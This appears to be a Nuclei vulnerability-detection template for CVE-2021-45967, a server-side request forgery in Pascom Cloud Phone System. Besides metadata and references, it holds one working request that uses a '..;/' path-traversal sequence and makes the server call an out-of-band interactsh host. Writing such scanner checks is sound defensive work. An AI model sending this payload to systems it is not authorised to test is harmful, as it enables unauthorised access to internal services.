40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2021-45967
|
|
|
|
info:
|
|
name: Pascom CPS Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.
|
|
reference:
|
|
- https://kerbit.io/research/read/blog/4
|
|
- https://www.pascom.net/doc/en/release-notes/
|
|
- https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html
|
|
- https://www.pascom.net/doc/en/release-notes/pascom19/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-45967
|
|
cwe-id: CWE-22
|
|
epss-score: 0.54239
|
|
cpe: cpe:2.3:a:pascom_cloud_phone_system:*:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: pascom_cloud_phone_system
|
|
tags: cve,cve2021,pascom,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|